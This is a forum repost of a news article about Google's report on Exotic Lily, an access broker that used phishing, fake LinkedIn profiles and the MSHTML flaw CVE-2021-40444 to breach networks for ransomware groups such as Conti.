1. Forum
  2. tqwNet
  3. TQW_GENTECH

  • Windows and LinkedIn flaws used in Conti ransomware attacks, Goog

    From TechnologyDaily@1337:1/100 to All on Fri Mar 18 15:00:04 2022
    Windows and LinkedIn flaws used in Conti ransomware attacks, Google warns

    Date:
    Fri, 18 Mar 2022 14:43:33 +0000

    Description:
    Google reveals Exotic Lily group has been selling access to corporate
    networks to ransomware operators.

    FULL STORY ======================================================================

    An initial access broker, working on behalf of the Conti ransomware group (among others), has been targeting hundreds of organizations every day, leveraging a flaw in MSHTML, a proprietary browser engine for Windows,
    Googles researchers are saying.

    Googles Threat Analysis Group found a group dubbed Exotic Lily working as an initial access broker - breaching target networks, before selling the
    acquired access to the highest bidder.

    Ransomware operators often outsource the initial access efforts, in order to focus entirely on the distribution of the ransomware itself, and the subsequent push towards ransom payment. TechRadar needs you!

    We're looking at how our readers use VPNs with different devices so we can improve our content and offer better advice. This survey shouldn't take more than 60 seconds of your time, and entrants from the UK and US will have the chance to enter a draw for a 100 Amazon gift card (or equivalent in USD). Thank you for taking part.

    Click here to start the survey in a new window << Fake LinkedIn scam

    Exotic Lily was relatively advanced in its tactics, and uses unusual amounts of gruntwork, for a mass-scale operation, Google claims.

    The group would use domain and identity spoofing to pose as a legitimate business, and send out phishing emails, usually faking a business proposal. They would also use publicly available Artificial Intelligence (AI) tools to generate authentic images of humans, to create fake LinkedIn accounts, which would help the campaigns credibility.

    After initial contact has been made, the threat actor would upload malware to a public file-sharing service, such as WeTransfer, to avoid detection by antivirus programs , and increase the chances of delivery to the target endpoint . The malware, usually a weaponized document, exploits a zero-day in Microsofts MSHTML browser engine, tracked as CVE-2021-40444. The second-stage deployment usually carried the BazarLoader. Read more

    Ransomware is now a billion-dollar market


    Ransomware attacks saw a huge rise in 2021


    Hit by ransomware? This is what you need to do now

    Googles researchers believe the group stands alone, and works for the higher bidder. So far, its been linked to Conti, Diavol, a swell as Wizard Spider
    (an alleged operator for the Ryuk ransomware).

    Exotic Lily was first spotted in September last year, and at peak
    performance, is able to send out more than 5,000 phishing emails to more than 650 organizations, Google claims. It seems the threat actor focuses mostly on firms in IT, cybersecurity, and healthcare, although its been casting a somewhat larger net, as of lately. These are the best firewalls right now

    Via: TechCrunch



    ======================================================================
    Link to news story: https://www.techradar.com/news/windows-and-linkedin-flaws-used-in-conti-ransom ware-attacks-google-warns/


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)